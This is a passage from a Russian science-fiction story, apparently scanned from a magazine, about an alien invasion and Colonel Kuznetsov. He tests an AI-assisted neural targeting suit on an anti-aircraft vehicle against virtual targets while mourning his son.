рячих шипящих гильз; поливая из "Калаша" ростовые мишени, 
он ощущал силу, которая вливалась в него вместе с грохотом 
ударного механизма. И как потом сладко ныло отбитое до ог- 
ромного лилового синяка плечо... 

Конечно же, он стал военным. Несмотря на привязанность к ору- 
жию стрелковому, индивидуальному - он решил стать офицером 
бронетанковых войск. Большие, пахнущие солярой и пышущие чер- 
ным дымом машины, качающие стволами на балансирах и увешан- 
ные детонационными плитами противоракетной защиты - они были 
невообразимо красивы. Рядом с ними концепт-кар от "Мерседес- 
Бенц" выглядел ущербной телегой конца девятнадцатого века. 

Пройдя длинный путь по должностной лестнице, дослужившись 
до высокого офицерского звания и будучи уверенным в завтраш- 
нем дне настолько, насколько может себе это позволить человек, 
живущий от тревоги до тревоги, он и не знал, что ДЕЛО НЕ В КРА- 
СОТЕ. Он понял это, когда пришла война... 

Шагая по гулким коридорам, приближающим его к очередному 
испытанию, он вспоминал о том, как весь мир замер в напряжении 
и томительном ожидании, когда пять с половиной лет назад арма- 
да аморфов зависла на высоких орбитах над Землей. Новостные 
каналы ежесекундно выплевывали строчки сообщений о контакте с 
внеземными цивилизациями, о начале новой эры в истории чело- 
вечества. И эта эра не заставила себя ждать. 

Не произошло ничего внешне примечательного, заметного. Во- 
круг Земли медленно вращались на геостационарных орбитах ги- 
гантские тела восемнадцати кораблей, никаких сигналов и следов 
активности, ничего. А потом на Земле стали исчезать люди. 

Пришельцы являли собой чудеса мимикрии, маскировки, поли- 
морфизма. Никто и никогда не мог внятно рассказать об облике 
инопланетян, о том, как выглядят их "челноки", на которых они 
благополучно "собирали дань" практически со всей поверхности 
планеты. Шаттлы маскировались подо все, что угодно - под при- 
вычные глазу самолеты и вертолеты разных моделей, под воздуш- 
ные шары, дельтапланы, метеозонды и прочие летательные аппа- 
раты. Распознать их было невозможно, ибо характеристики целей 
на экранах радаров совпадали до мелочей. 


Этот период, который продолжался около полугода, был назван 
в истории войны с аморфами "периодом тихой агрессии". С Зем- 
ли было вывезено около восьми тысяч человек - и настолько неза- 
метно, что только по прошествии времени удалось оценить весь 
масштаб трагедии. За это время неоднократно предпринимались 
попытки установить связь с кораблями, находящимися на орбите - 
безрезультатно. Кузнецов помнил, как он с душевным трепетом 
ждал выпусков новостей, в которых просто должна была проско- 
чить информация о том, что получен ОТВЕТ - но этого не случи- 
лось. Просто аморфы один - ОДИН! - раз прокололись в своем ис- 
кусстве супермаскировки; и все встало на свои места. 

Всего только раз люди увидели, как у них на глазах частный од- 
номоторный самолетик "Сессна" превратился в нечто, напоминаю- 
щее летающий гриб, перевернутый шляпкой вниз. Этот "гриб" про- 
шел на бреющем полете над маленьким золотистым пляжем, полу- 
кольцом огибающим небольшое озерцо на юге Канады. Его виде- 
ли одновременно около четырехсот отдыхающих; практически все 
они смогли засвидетельствовать тот факт, что из воды неизвест- 
ной силой было извлечено два пловца, находящихся довольно да- 
леко от берега. Эта сила просто скрутила их, как мокрую от воды 
тряпку, взметнув вокруг них облако кровавых брызг, после чего 
втянула внутрь "гриба" уже мертвые тела. Судя по всему, те, кто 
пилотировал летательный аппарат, не имели понятия о том, что 
были замечены; они просто выполнили свою работу. 

Кое-кто успел сделать несколько фотографий, у двоих под рукой 
оказались видеокамеры. Спустя полчаса доказательства агрессии 
уже были в эфире. Нашлись несколько аналитиков, уже долго ра- 
ботавших в тиши кабинетов над этой проблемой - они-то и выдви- 
нули гипотезу о том, что Земля стала объектом длительных, частых 
и бесчеловечных экспериментов над людьми. "Некая могущест- 
венная раса использует нас, как аквариумных рыбок, - писали уче- 
ные в обращении к президентам великих держав. - Над Землей на- 
вис огромный сачок, которым эти до сих пор неизвестные твари 
выгребают нас для непонятных целей - при этом, наверное, даже 
не замечая всей негуманности происходящего". 

Кузнецов, который был ознакомлен с полным текстом этого об- 
ращения, как офицер, имеющий доступ к секретной информации, 
был поражен, насколько беспомощны оказались земляне перед уг- 
розой извне. Впервые после победы над исламским кошмаром 
Земля оказалась перед лицом действительно всеобщей опасности 
- но даже в этот момент объединиться всем и сразу оказалось не 
под силу. Во все времена находились люди, которые делали день- 
ги на большой беде. ТАК СЛУЧИЛОСЬ И НА ЭТОТ РАЗ. 

Вооруженные силы практически всех передовых стран были го- 
товы прийти на помощь всем, кто попросит помощи - не считая на- 
селения собственных земель. Но одного желания было мало - на- 
до было располагать соответствующим вооружением. Первые 
столкновения с силами аморфов случились практически через 
день после того злополучного для них промаха с маскировкой. Бы- 
ли нанесены ракетные удары по кораблям, висящим в космосе. 

Цели достигла лишь одна ракета, выпущенная из шахты под Но- 
восибирском. Неизвестный капитан, уже седьмой год прозябав- 
ший в шахте на боевом дежурстве, от жуткого безделья приделал 
к программе наведения и лжецелеуказаний свой кусок кода, потом 
прописал его на тренировочном стенде, изучил работу и в один 
прекрасный день, полностью убедившись в том, что он - несосто- 
явшийся лауреат Нобелевской премии, выполнил прошивку про- 
граммы ракеты, находящейся на боевом дежурстве. Он был един- 
ственным из всей смены, кто знал о том, что ракета двадцать во- 
семь минут находилась в небоеспособном состоянии... Сервисные 
программы, обслуживающие ракету, благосклонно восприняли те 
исправления, что внес капитан - а при атаке воспользовались 
именно ими, так они имели самый высокий приоритет. И ракета, 
создав при помощи новых указаний такие ложные цели, что их не 
смогла правильно распознать система защиты корабля, благопо- 
лучно превратила его в радиоактивный кусок дерьма. 

Конечно, они ответили. Ответили страшно, по-своему. Это не бы- 
ло ядерным Апокалипсисом. Но и радости не принесло ни на грамм. 

Война началась. Как назвали ее средства массовой информации 
- "Зондовая война". Базовые корабли не были готовы к боевым 
действиям, но вот шаттлы аморфов доставляли землянам огром- 
ное количество проблем. И кто-то, вспомнив, как одна-единствен- 
ная ракета преодолела сотни километров и нашла брешь в оборо- 
не аморфов, решил, что нам нужен искусственный интеллект. Та- 


кой, что сможет находить дорогу к противнику через пустоту кос- 
моса. Так началась битва за небо. За то самое небо, которое за- 
брало у полковника сына... 

Ведущие программисты всего мира, которые были в состоянии 
решить поставленную задачу, принялись за дело в специально 
оборудованном и защищенном подземном центре. Почти все кор- 
порации, занимающиеся созданием программного обеспечения, 
предоставили свои разработки для открытого изучения. До по- 
следнего держался только Майкрософт, глава которого так и не 
смог расстаться с исходным кодом "Windows". Несмотря на много- 
кратные увещевания общественности, он оставался непреклонным 
в своем желании унести с собой в могилу свои миллиарды, не по- 
делившись с гибнущим в войне миром. И пуля снайпера помогла 
ему в этом. 

После смерти великого и могущественного Билли его преемни- 
ки стали сговорчивее. Необходимая информация стала доступной. 
Работа закипела с новой силой. И через полтора года с успехом за- 
вершилась. 

Никто не тешил себя надеждами на то, что создано супероружие, 
которое в ближайшее время избавит планету от агрессоров. Слиш- 
ком уж сильны оказались аморфы, время от времени сметающие 
города с лица Земли. Но и отчаиваться больше не было причин. 

Полковник вспомнил, как все, кто следил за тайным ходом разра- 
боток, ожидали чего угодно, но только не того, что получилось. Мно- 
гие далекие от вооружения люди просто считали, что в итоге будет 
создана некая ракета, способная сбить на геостационарной орбите 
базовые станции аморфов. Однако все оказалось несколько иначе. 

Ученые пошли по другому пути. Они создали искусственный 
мозг, который мог, вооружившись рядом многочисленных анало- 
гий и богатым опытом столкновений с аморфами, вычислять зама- 
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скированные катера пришельцев. При желании этот мозг можно 
было приспособить к любому современному виду оружия - и оно 
становилось смертельным для аморфов, ибо их спускаемые аппа- 
раты могли быть сбиты простейшими ракетами "земля-воздух". 
Практически все боевые действия пришельцы вели локально, не 
совершая каких-то сверхмощных ударов с орбиты - вполне воз- 
можно, что к подобному роду действий их корабли не были при- 
способлены. Поэтому успешное внедрение изобретения в воору- 
женные сил стран, занятых безопасностью Земли, могло сущест- 
венно изменить ход событий в пользу обороняющихся. 

Как всегда, авторы получили замечательные результаты, но не 
стоило им слепо доверять. Было принято решение об испытании 
изобретения независимыми экспертами по вооружению и компью- 
терной технике. Через неделю после его начала стало ясно, что 
проект на грани провала. 

Оказалось, практически невозможно изменить начинку совре- 
менной военной техники для того, чтобы полученный "мозг" смог 
оперировать распознаванием и стрельбой. Требовалось еще очень 
и очень много времени для модернизации существующих моделей 
танков, зенитных и ракетных установок, создания новых моделей 
техники. И тогда было решено не изменять вооружение. Выясни- 
лось, что проще ИЗМЕНИТЬ ЛЮДЕЙ. 

Для этого к работе были привлечены люди с экстрасенсорными 
способностями, апологеты парапсихологии, гипноза, элита “Х- 
Files" - короче, все Te, кому не требовалось много времени, чтобы 
заставить свои мозги думать так, как это нужно по условию экспе- 
римента. Многие из них не выдерживали напряжения, отказыва- 
лись сами, сходили с ума, становились инвалидами - но около 
двадцати человек остались в проекте и сумели сделать то, что от 
них требовалось. 

Программа "искусственного интеллекта" была сращена с чело- 
веческим мозгом путем создания временных подключений к коре. 
Проще сказать, это выглядело, как винчестер на салазках. Воткнул 
- работает. Вытащил - не работает. Человек надевал на себя спе- 
циальный нейросенсорный костюм, выполнял подключение в заты- 
лочных долях, ответственных за зрение, после чего превращался в у 
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некое подобие живого прицела. От него требовалось увидеть цель 
и определить ее принадлежность - либо к нашему миру, либо к 
чуждому нам. И вот тогда уже в бой вступало железо. 

Вроде бы все получилось. Но иметь на всю планету всего двад- 
цать "живых прицелов" - безумно мало. Работы были направлены 
на расширение круга людей, способных управлять подобного рода 
техникой. В очередной раз команду программистов лихорадило. 
Люди продолжали гибнуть, аморфы терроризировали Землю с за- 
видной периодичностью, заставляя людей со страхом смотреть в 
небо. Одни безумные проекты сменяли другие; люди теряли свои 
должности, что было для военных ведомств обычным явлением 
при невыполнении приказа вовремя - а эти работы выполнялись на 
уровне приказов, возражения и промахи не принимались, и только 
огромный авторитет ученых удерживал руководителей проекта от 
решения вопросов в духе военного времени. Хотя слово "расстрел" 
неоднократно звучало в речи министров обороны. 

Конечно, все получилось. В такие трудные годы все должно по- 
лучаться - иначе просто и быть не может. Решение пришло внезап- 
но; отличился один из нейрофизиологов, в свое время написавший 
заумную работу, посвященную строению сетчатки глаза. И в отли- 
чие от его диссертации, которая была понятна лишь узкому кругу 
специалистов, его изобретение оказалось близко и доступно де- 
сяткам тысяч людей. 

С помощью небольшой группы программистов он сумел разра- 
ботать прицел, проецирующийся непосредственно на глазное дно, 
на саму сетчатку. Изучив работу мозговых центров и основываясь 
на первых опытах с участием людей с паранормальными способно- 
стями, он сумел создать принцип определения цели. 

На сетчатку одного глаза проецировался сам объект, а на сет- 
чатку второго - непрерывная цепь ассоциированных образов. Все 


Полковник прекрасно знал 
расположение каждого из них 
- всего таких датчиков было 
двадцать четыре. 


дело было в их совпадении - при появлении сходства (программа 
определяла его более чем по сорока параметрам человеческого 
организма, которые при этом изменялись) управление передава- 
лось боевому компьютеру. Но самое главное было не в этом - при 
появлении неизвестной цели компьютер особым образом подсте- 
гивал центры анализа и синтеза зрительной информации, позво- 
ляя человеку самостоятельно принять решение о принадлежнос- 
ти летательного аппарата, после чего полученный образ дополнял 
собой базу данных. Процент погрешности при этом был мини- 
мальным - всего несколько тысячных. Оставалось использовать 
возможности человека, играющего роль прицела, более активно 
- был создан костюм, который определял уверенность и готов- 
ность человека стрелять; находясь внутри этого эластичного об- 
легающего костюма, человек превращался не только в прицел, он 
становился живым спусковым механизмом. Каждое шевеление 
его пальца, глубокий вдох, поворот головы - любое движение те- 
ла вызывало реакцию автоматики и подчиняло себе механизмы 
стрельбы и движения. 

Конечно, существовали моменты, когда просто невозможно бы- 
ло доверить ответственное решение человеку - и наоборот, не все 
мог компьютер. Система контролировала сама себя, пытаясь до- 
стичь равновесия. По большому счету, роль человека сводилась 
все-таки не к TOMY, чтобы стрелять - скорее, наоборот, к тому, что- 
бы не допустить необратимых вещей, типа стрельбы по пассажир- 
ским самолетам. 

К испытанию новых видов вооружения были привлечены лучшие 
испытатели со всего мира. В их числе оказался и полковник Кузне- 
цов, тогда еще имевший вместо трех звезд на погонах всего одну. 
Поначалу все казалось ему чересчур сложным, запутанным - уста- 
вали глаза, к вечеру кружилась голова, стало прыгать давление 
(все это было побочными явлениями от бликовых устройств, про- 
ецирующих прицел - достаточно быстро были изобретены успока- 
ивающие вещества, не влияющие на скорость реакции, и об этой 
проблеме забыли). 

Постепенно он втянулся. Поначалу стал показывать хорошие ре- 
зультаты в стрельбе, потом соревновался в скорости с компьюте- 
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ром, угадывая новые цели; его привлекали тестировать "начинку" 
танков, артиллерии, штурмовиков, передвижных зенитных ком- 
плексов. В "русском звене" программы "Защитники неба" Кузне- 
цов, мгновенно взлетевший по служебной лестнице, считался едва 
ли не самым лучшим. Его результаты достигали самых высоких 
цифр, время от времени он привлекался к патрулированию Сибир- 
ского сектора в ожидании прогнозируемых нападений аморфов и 
сбил несколько их боевых катеров. Но основные его успехи были, 
конечно же, на полигоне. 

Техника, прошедшая через его руки, практически всегда уходи- 
ла в серийное производство - либо шла в "корзину". К его мнению 
прислушивались программисты, изготовители вооружения, произ- 
водители прицелов, организаторы оборонных рубежей и простые 
солдаты, участвующие в обслуживании высокоинтеллектуальной 
техники. Его авторитет вырос до недосягаемых вершин - и лишь 
смерть сына заставила его изменить свои взгляды на войну. 

Та невообразимая усталость, которая обрушилась на него, за- 
полняя пустоту в сердце, побудила его стать более точным, более 
внимательным, более требовательным к себе. Работа стала смыс- 
лом его жизни - он хотел каждым своим движением, взглядом, вы- 
стрелом приблизить конец войны. Кузнецов возложил на себе мис- 
сию мести - и нес ее знамя, гордо подняв голову. Призрак сына 
время от времени всплывал перед его расчерченными на прицель- 
ные сетки глазами... 
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Надевание костюма требовало определенных навыков, которы- 
ми Кузнецов обладал уже на уровне автоматизма. Самым сложным 
было совместить метки сенсоров на внутренностях костюма с дат- 
чиками, внедренными непосредственно под кожу. Два раза в год 
испытатели проходили медицинское обследование на предмет ми- 
грации датчиков - инородные тела в теле человека, как бы ни ста- 
ралась наука сделать их максимально родственными каждому офи- 
церу в отдельности, время от времени могли быть исторгнуты на- 
ружу; организмы людей под руководством медиков потихоньку 
смирялись с тем, что где-то внутри находятся маленькие квадрати- 
ки из сверхпроводника, призванные доводить до контрольной ап- 
паратуры параметры человеческого тела. 

Полковник прекрасно знал расположение каждого из них - все- 
го таких датчиков было двадцать четыре. Когда облегающая синте- 
тика костюма коснулась кожи, чтобы на время работы слиться с 
ней в единое целое, на экране перед ним появился контур собст- 
венного тела, на котором поочередно зажигались зеленые огоньки 
- датчики костюма и подкожные кристаллы входили в контакт, ком- 
пьютер обменивался с ними данными, после чего мигание огонька 
прекращалось, и он начинал гореть ровным светом, подтверждая 
правильность подключения и отсутствие патологии на своем участ- 
ке. По большому счету, то, что делал на медосмотре Волощук, не 
требовалось - здесь все происходило вновь, и на более высоком 
уровне. Просто в армии так было всегда - отдавать дань тем инст- 
рукциям, что были написаны задолго до появления подобных ком- 
пьютерных анализаторов. 

Кузнецов старался не смотреть на экран - вся эта информация 
его не интересовала. Он прекрасно понимал, что в течение бли- 
жайшей минуты будет определен недопустимый уровень алкоголь 
в крови и - возможно - изменения в кардиограмме. Но изменить 
его решения это уже не могло. 

Когда-то, пару лет назад, он уже испытывал на себе нечто подоб- 
ное - надеялся найти некий катализатор, при помощи которого про- 
цент ошибок при стрельбе можно свести к абсолютному нулю. Ре- 
зультат был довольно предсказуем - это оказался АЛКОГОЛЬ. Подо- 
брать такую дозу, которая влияла бы на растормаживание ассоциа- 
ций, при этом не нарушая координации, оказалось очень сложно - 
но полковник сумел это сделать путем длительных экспериментов 
на себе. Сегодня утром он отпил из любимой фляжки ровно столь- 
ко коньяка, сколько требовалось для успешной стрельбы. 

Один из датчиков, анализирующих химический состав крови, 
пискнул и загорелся красным. Кузнецов угрюмо посмотрел на эту 
яркую точку на экране компьютера, безо всяких эмоций взял со 
стола заранее приготовленный скальпель и, аккуратно прикоснув- 
шись к медному проводнику, идущему вдоль рукава к главному 
анализатору на левом плече, перерезал его. Лампочка погасла. 

Через пару секунд должна была загореться еще одна, преду- 
преждая о проблемах с сердцем. Но этого не произошло - компью- 


тер посчитал, что "мотор" у Кузнецова в настоящий момент работа- 
ет достаточно хорошо. Полковник картинно кивнул экрану, благода- 
ря его за снисходительность, после чего протянул руки к шлему. 

Это была самая главная деталь костюма. Его основа, так ска- 
зать. Рама шлема сообщалась с головным мозгом через несколько 
датчиков, кольцом опоясывающих череп. Нечто, напоминающее 
очки для виртуальной реальности, надвигалось на глаза и отгора- 
живало полковника от всего мира. Через несколько секунд запус- 
калась программа для адаптации глаз, на сетчатку проецировались 
различные геометрические узоры с постепенным нарастанием яр- 
кости и контрастности. Через две с половиной минуты после наде- 
вания шлема полковник был готов. 

Он медленно встал, прислушиваясь к своим ощущениям. Кос- 
тюм стал второй кожей; Кузнецов ощущал взаимодействие датчи- 
ков с телом. Сквозь боевой анализаторный блок в текущий момент 
времени пропускался огромный объем информации, контролирую- 
щий все сигнальные системы; подключение к ассоциативным цен- 
трам мозга активировалось постепенно, как бы исподволь - чтобы 
не вызвать того, что на первых порах экспериментов называлось 
"галлюцинаторным штормом". Испытатели оказывались в плену 
собственных эмоциональных кошмаров, вытащенных из глубин со- 
знания при помощи зондирования. Образы, внезапно накатывав- 
шие на испытателей, не обязательно были жуткими - но, тем не 
менее, значительная часть людей отсеялась именно в этот период 
совершенствования техники. 

Кузнецов в свое время тоже испытал "галлюцинаторный 
шторм" на себе - УВИДЕВ В ПРИЦЕЛЕ ЛИЦО СВОЕЙ МАТЕРИ. 
Тогда он с трудом сумел справиться с собой. Похоронив мать 
шесть лет назад, он никак не мог ожидать ее увидеть - а ком- 
пьютеру было абсолютно все равно, какие образы подключать 
к боевому анализатору. Покинув пилотскую кабину истребите- 
ля, который в этот момент готовился к взлету, Кузнецов вих- 
рем ворвался в диспетчерскую к операторам полигона и в же- 
сткой форме потребовал объяснений происходящего. После 
этого в области медицины, работающей в тесном контакте с 
группой по "искусственному интеллекту", появился "синдром 
Кузнецова". На борьбу с ним были направлены множество 
психологов, психиатров и специалистов по нейропрограмми- 
рованию. Решение нашлось - и заключалось оно в постепен- 
ном "разогреве" центров, ответственных за память и ассоциа- 
ции. Как выяснилось, для этого достаточно было растянуть 
процесс включения центров на две минуты. Добавив к полу- 
ченному результату еще тридцать секунд, ученые получили га- 
рантированный результат. Компьютер успевал отсеять гаммы 
образов, не нужных для опознания кораблей аморфов, блоки- 
руя их на то время, которое мозг человека находился в под- 
ключении к прицельной системе. 

Первые шаги к выходу на полигон давались с трудом - компью- 
тер анализировал мышечный тонус и создавал наилучшие условия 
для движений. Постепенно тяжесть при ходьбе исчезла, напротив 
- появилась легкость, уверенность в себе. Подойдя к служебному 
лифту, Кузнецов дождался, когда автоматика опознает его и впус- 
тит в шахту. Кабина быстро вынесла его наверх, где дождик уже за- 
кончился и уступил место солнечному дню. 

В двадцати метрах от выхода стояло очередное чудо военной 
техники - передвижной зенитно-ракетный комплекс на базе гусе- 
ничного вездехода. Теория Кузнецова о красоте в очередной раз 
находила свое подтверждение. Машина отнюдь не производила 
впечатления громоздкости, неуклюжести. Идя сквозь короткий 
строй патрулей, полковник отмечал в ней черты, присущие скорее 
чему-то легкому и воздушному; вес брони не ощущался даже при 
подходе вплотную. 

Четыре тонких орудийных ствола, собранных на турели по два, 
смотрели вертикально в небо. Впереди них - две несущие рельсы 
для ракет. Сейчас они были пусты - в задачу испытания ракет не 
входили. Кто-то не успел доработать систему наводки на источни- 
ки излучения тепла, и ракеты с задания сняли. 

Возле машины стоял инженер, готовивший ее к работе. Его пол- 
ковник видел впервые; коротко козырнув ему, он протянул руку. 
Инженер кивнул, вложил в ладонь Кузнецову ключ, спросил: 

- Вопросы будут? 

- Нет, - коротко ответил Кузнецов. - Вы сделали то, что я про- 
сил? 

Инженер усмехнулся, махнул рукой: 


- Да. Просто скажете вслух, что вам надо - и вас услышат. 

- Замечательно, - улыбнулся под прицельной маской Кузнецов. 
- Вы позволите? 

И он, взявшись рукой за многочисленные поручни, расположен- 
ные вдоль борта, запрыгнул на броню, аккуратно нырнул в люк и 
закрыл его за собой. 

Внутри было просторно - но это только потому, что сегодня эки- 
паж был не в полном составе. Обычно он состоял из трех человек 
- командира, водителя и старшего по вооружению, который выпол- 
нял функции инженера-программиста, наводчика и техника. Сего- 
дня же Кузнецов собирался один заменить всех. 

Он опустился в кресле водителя и подключил свой костюм при 
помощи пары специальных разъемов к бортовой компьютерной се- 
ти, которая замыкалась на оператора полигона. В ушах негромко 
треснуло, зашипело, потом раздалось приветствие дежурного по 
полигону: 

- "Рыба-молот", выдвижение к старту разрешаю. 

- Принял, - коротко сказал полковник, сильно сжал веки, потом 
медленно открыл глаза. Это был сигнал для активации прицелов. 
Мягко засветились лучики, идущие откуда-то от наружных углов 
глаз; со стороны это выглядело как ореолы света вокруг глаз. 

- Ну что, проверим, что они сделали, - усмехнулся Кузнецов, 
следя за мимикой (любое неосторожное движение могло включить 
автоматику стрельбы). - Музыку... 

В ушах зазвучала бас-гитара, а через несколько секунд - до бо- 
ли знакомое: "А vacation in the foreign land, Uncle Sam does the best 
he can..." 

- You're in the army now... - подпел Кузнецов. - Молодец... "Ры- 
ба-молот" - оператору. Я на позиции. К работе готов. 


Четыре тонких орудийных 
ствола, собранных на турели 
по два, смотрели 
вертикально в небо. 


- По сигналу "Три" - активировать боевую автоматику, по сигна- 
лу "Пять" - начать движение. Первое препятствие наземное, вто- 
рое и третье - воздушные. Задачи - проверить ходовую часть, от- 
работать стрельбу по стенду, после чего выполнить тесты по ассо- 
циациям с воздушными целями. Как поняли? 

Кузнецов повторил все и замер в ожидании счета. 

- Один... Два... - начал считать стартовый робот. На счет "Три" 
Кузнецов резко сжал в кулак левую кисть, повернув ее внутрь. На 
броне чувствительные сервомоторы турели взвизгнули на долю се- 
кунды, переходя из дежурного режима "stand Бу" в режим активно- 
го патрулирования. Стволы качнулись и синхронно поднялись к не- 
бу в походное положение. 

- Четыре... Пять... - договорил металлический голос. 

- Вперед, - скомандовал Кузнецов. И послушная машина отклик- 
нулась на его приказ плавным движением. Двигатель выбросил об- 
лачко черного дыма, гусеницы взметнули грязь - испытание нача- 
лось. 

Полковник практически не ощущал движения внутри машины. 
Подвеска, будучи в такой технике активной и "думающей", заранее 
отслеживала все неровности местности, включала компенсаторы, 
позволяя водителю в своей микрокапсуле испытывать комфорт, 
какого только можно достичь в технике. Пройдя несколько поворо- 
тов, Кузнецов придал машине ускорение, выполнил два прыжка, 
после которых удивленно сообщил оператору о полном отсутствии 
инерционных толчков при приземлении. 

- Стараемся, - ответил оператор и отключился. Полковник по- 
качал головой, но, услышав предупреждающий гудок в наушни- 
ках, поймал себя на мысли, что еще не до конца запомнил всю 
схему управления машиной и что любое его непродуманное дви- 
жение способно заставить технику выполнить что-либо незапла- 
нированное. 

- Подсказки, - бросил полковник в пустоту водительской капсу- 
лы. В ушах TyT же зазвучал мягкий женский голос, перечисляющий 
функции сенсорного костюма в порядке важности. 

- По группам, - уточнил Кузнецов. Порядок чтения инструкции 
сменился, теперь они сообщались ему посекционно - и на первом у 


4 
5 
= 
о 
= 
8 
8 
о 


АСТОЯЩИЙ ПОЛКОВНИК 


| 


4 
5 
= 
о 
| 
@ 
8 
о 


НАСТОЯЩИЙ ПОЛКОВНИК 


месте были, как он и предполагал, инструкции по стрельбе. За го- 
лосом, диктующим полковнику подсказки, тот различил еле улови- 
мый фон - оператор включил связь и интересовался, что происхо- 
дит в машине. 

- "Рыба-молот" - оператору. Повторенье - мать ученья... 

Фон исчез. Успокоенный оператор прекратил подслушивать и 
принялся следить за отметкой на радаре. Тем временем машина 
преодолела всю полосу препятствий, в конце ее обрушив пару бе- 
тонных плит, после чего был проведен быстрый тест оптики и сер- 
вомоторов турели. Вывод успокоил и Кузнецова, и оператора - ма- 
шина была в полном порядке. 

Полковник повел головой из стороны в сторону - круглые рамки 
прицелов, перечеркнутые дистанционными линиями, показали ему 
полуокружность полигона. Он поднял глаза - над ним нависали че- 
тыре толстых ствола с рассеивателями пламени на концах. 

Нависла гнетущая пауза. Кузнецов знал, что сейчас компьютеры 
полигона создают ему цель - виртуальную. Соответствующую всем 
условиям, которые могут возникнуть при патрулировании. Полков- 
ник застыл в напряжении, ожидая чего-то сверхъестественного, 
хотя прекрасно понимал, что все будет в рамках реального и необ- 
ходимого - вряд ли он увидит в облаках воздушный шар братьев 
Монгольфье. 

Почему-то вспомнил о жене. В голове взбрыкнула и тут же за- 
тихла, задавленная волей Кузнецова, мысль о том, что если бы не 
эта война, которая продолжается вот уже шесть лет - он бы уже 
был на пенсии, у них был бы прекрасный домик на берегу Волги, 
они нянчили бы внуков и вспоминали, вспоминали... А потом перед 
глазами промелькнуло лицо сына, каким он его видел перед по- 
следним полетом, потом гранитное надгробье - и на этом идиллия 
с домиком в мозгу прервалась окончательно. 


Нависла гнетущая пауза. Куз- 
нецов знал, что сейчас ком- 
пьютеры полигона создают ему 
цель - виртуальную. 


Тревожный гудок вывел его из раздумий. В глазах засвер- 
кали сменяющие друг друга непонятные образы, выдранные 
настойчивым компьютером из мозга. Правым глазом, на кото- 
рый сейчас транслировалось небо над головой, он увидел 
вертолет Ми-8, идущий на высоте шестисот метров (дально- 
мер сигнализировал об этом маленькой надписью на самой 
границе поля зрения). 

- Больше, - произнес Кузнецов. Вертолет будто метнулся на- 
встречу и, увеличенный, повис перед самым носом полковника. 
На борту проступил российский герб, номер и надпись "МЧС". 
Слегка поведя головой, Кузнецов осмотрел кабину вертолета, 
увидел там двух пилотов, мирно беседующих между собой, по- 
том заглянул в каждый иллюминатор - внутри было пусто, по 
крайней мере, на первый взгляд. Вертолет неторопливо полз в 
сторону от полигона - туда, где за рощицей скрывался военный 
городок, из которого и прибыл на работу полковник. В течение 
примерно двух-трех минут он был бы еще виден - а потом дол- 
жен был снизиться, чтобы не вляпаться в облачность, и исчез- 
нуть за деревьями. 

Кузнецов поначалу даже не понял - цель это или настоящий вер- 
толет, совершающий плановый полет. Однако требовательный го- 
лос оператора развеял его иллюзии: 

- "Рыба-молот", вы запоздали со временем реакции. Прошу вас 
собраться. 

Оператор не навязывал полковнику темп - он пока что вежли- 
во просил. Да Кузнецов и сам понимал, что совершил ошибку, 
поддавшись эмоциям. Выругав себя сквозь зубы, он легко поше- 
велил пальцами на руках - турель мгновенно поймала вертолет в 
захват и принялась сопровождать цель, медленно заваливая угол 
к горизонту. Кузнецов сосредоточился на изображениях, длин- 
ной чередой проносящихся у него перед глазами. Внезапно что- 
то коротко пискнуло; изображения, спроецированные на оба гла- 
за, слились в стереообраз вертолета Ми-8. Контур костюма за 
долю секунды просчитал параметры узнавания. Перед лицом 
полковника - на расстоянии вытянутой руки - проступила фраза: 
"ЦЕЛЬ ОПОЗНАНА. ОГОНЬ!" 
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- Огонь! - повторил Кузнецов. По стволам пробежала цепь сиг- 
нальных огоньков, на замковых частях вспыхнули красные маячки, 
предупреждающие о боевой готовности; спустя секунду из четырех 
стволов в сторону вертолета метнулись длинные нити трассирую- 
щих пуль. 

Воздух полигона наполнился воем и грохотом. Внутри води- 
тельской капсулы бой механизма не ощущался практически ни- 
как; Кузнецов внимательно, не шелохнувшись, отследил трассе- 
ры до контакта с целью, прошептал "Есть!.." и увидел, как вер- 
толет, развалившись пополам от мощного удара крупнокалибер- 
ных пуль и освещая мрачные сумерки пламенем двигателя, па- 
дает в рощу. 

Сколько раз Кузнецов видел падение виртуальных целей - но ни- 
как не мог отделаться от мыслей о тех, кого это падение могло за- 
стать врасплох внизу; неоднократно он спрашивал об этом опера- 
торов и в ответ получал лишь усмешку - эти цели существовали 
только в шлеме полковника. Вот и сейчас - мысль о том, что кто- 
нибудь мог оказаться там, куда падали горящие обломки, не поки- 
дала его. Оператор, зная, что Кузнецов не удержится от вопроса, 
произнес, предупреждая: 

- Цель поражена и будет удалена с экрана. 

Накатил звук морской волны, всегда сопровождавший удач- 
ные попадания (кто-то из психологов посчитал, что этот звук 
очень приятен и успокаивает стрелков); вертолет, не долетев и 
половины расстояния до земли, вдруг замерцал, словно по экра- 
ну телевизора пошла рябь, и исчез, не оставив после себя даже 
Дымной полосы... 

- Вот так... - недоверчиво сказал Кузнецов и несколько секунд 
продолжал вглядываться в опустевшее небо. Впервые его посе- 
тило ощущение нереальности происходящего. Он вспомнил, как 
однажды сбил катер аморфов, выглядевший как "кукурузник", 
пробирающийся на бреющем полете над молодыми елочками не- 
далеко от Иркутска. Тогда этот самый трудяга-самолетик вспых- 
нул как порох, за считанные секунды вошел в штопор и устроил 
такой пожар в лесонасаждениях, что несколько бригад пожарни- 
ков пыталось потушить его в течение трех суток, после чего по- 
ступили разумно - направленными взрывами вырубили лес на 
участке, прилегающем к городу. Огонь, наткнувшись на разворо- 
ченную землю и не найдя пищи, заглох к исходу пятого дня. Все- 
го лишь маленький самолетик; всего лишь одна ракета, послан- 
ная по приказу глаз Кузнецова... 

Когда из облаков вынырнул бомбардировщик, Кузнецов был к 
этому готов. Шума винтов он не слышал; немое падение машины, 
начиненной смертельным грузом, завораживало полковника, од- 
нако костюм и компьютер не дали ему рассуждать - серия гудков, 
мелькание образов, "ЦЕЛЬ ОПОЗНАНА", легкое движение губ... 
Огненная стена, расчерченная нитями трассеров прямо перед но- 
сом у виртуального экипажа нападающего самолета, на мгнове- 
ные скрыла ero от Кузнецова. Потом из сверкающего, дробящего- 
ся на части дымного облака вывалились обломки того, что неког- 
да было бомбардировщиком. К земле понеслись пылающие кус- 
ки обшивки; стволы продолжали поливать их свинцом, полностью 
захватив управление стрельбой - компьютер выделял в этой ог- 
ненной каше бомбы, высвобожденные взрывом из захватов и 
мчащиеся к земле. Короткая серия мощных глухих взрывов про- 
звучала в ушах Кузнецова; ни одна из бомб не достигла земли, 
будучи взорванной в воздухе. 

На этот раз оператор не стал убирать изображение. Черные, оп- 
лавленные и уже прекратившие гореть куски самолета упали в не- 
